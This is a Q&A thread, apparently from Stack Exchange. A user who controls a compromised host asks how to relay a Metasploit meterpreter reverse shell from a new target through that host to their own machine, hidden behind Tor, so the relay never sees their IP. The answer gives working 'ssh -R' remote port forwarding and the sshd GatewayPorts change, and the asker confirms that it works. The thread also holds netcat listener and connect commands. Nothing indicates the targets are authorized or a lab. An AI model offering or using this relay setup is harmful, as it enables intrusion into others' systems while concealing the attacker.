3

first of all I want to say that my issue is not about the 'Portfwd' option of the meterpreter: https://www.offensive-security.com/metasploit-unleashed/portfwd/

Lets say I have access to 2 computers:
- Computer A is mine and is running linux.
- Computer B is a compromised host and is also running linux.
- Computer C is the one I want to compromise.

I am using metasploit framework for this purpose. How can I achieve setting a reverse tcp connection from C to B and then connect from A to B to grab the meterpreter session ? The thing is, I don't want B to know the ip address of A at any point. That is why it's A which will have to start the connection (using proxychains or any other program to hide its real IP).

First I tried to reproduce this problem using netcat but maybe I have misunderstood something there:
- Computer A is running a netcat server on port 4444: nc -l -p 4444 (because A will run the meterpreter server).
- Computer C will connect to B on port 8888 nc 'B' 8888 (because C will execute the payload and will connect to the compromised server so it has no link with my real IP)
- Computer B will have to set up a netcat listener on port 8888 to accept a tcp connection from C (I am not sure about this one)

Now my question is: how can I get the connection between B and A without B knowing the ip address of A.

I tried to use ssh to do a local port fowarding from A to B:
torify ssh -NL 4444:localhost:8888 B but it is telling me that the port 4444 is already used (by the nc listener on A)
I drew a simple scheme so maybe it will be more clear, the following scheme is what I would like to have: port fowarding

Django
  • 33
  • 4

1 Answers1

2

So, you want to forward port B:8888 to A:4444 from server A, 

A:$ ssh -R 8888:localhost:4444 B

This opens port 8888 listening on B and forwards connections to port 4444 on A, where your server is. This works if the ssh server in B has the configuration option GatewayPorts set to yes.

If GatewayPorts is set to clientspecified you could use one of the following commands,

A:$ ssh -R  :8888:localhost:4444 B
A:$ ssh -R *:8888:localhost:4444 B

GatewayPorts unset or set to no binds the socket to localhost, preventing the remote forwarding to work.

xae
  • 1,971
  • 16
  • 10
  • I forgot to mention that I also tried this solution but when I do that, even if the port 8888 appears open on B (using netstat) it is not when I try to connect from A to B. It says 'connection refused' which make me think the port is closed (nmap also said the port look like closed). And I know it is not a firewall issue since I can open the same port using a netcat listener and I will be able to connect to it from A this time. If it can help B server is a virtual private server. – Django Apr 03 '17 at 20:44
  • Adjust the configuration of the ssh server in B to set the option GatewayPorts to "yes". – xae Apr 03 '17 at 23:03
  • You were right this was the only thing missing here ! Now it is working like a charm thanks ! – Django Apr 03 '17 at 23:22
  • Answer edited to include info about GatewayPorts – xae Apr 03 '17 at 23:37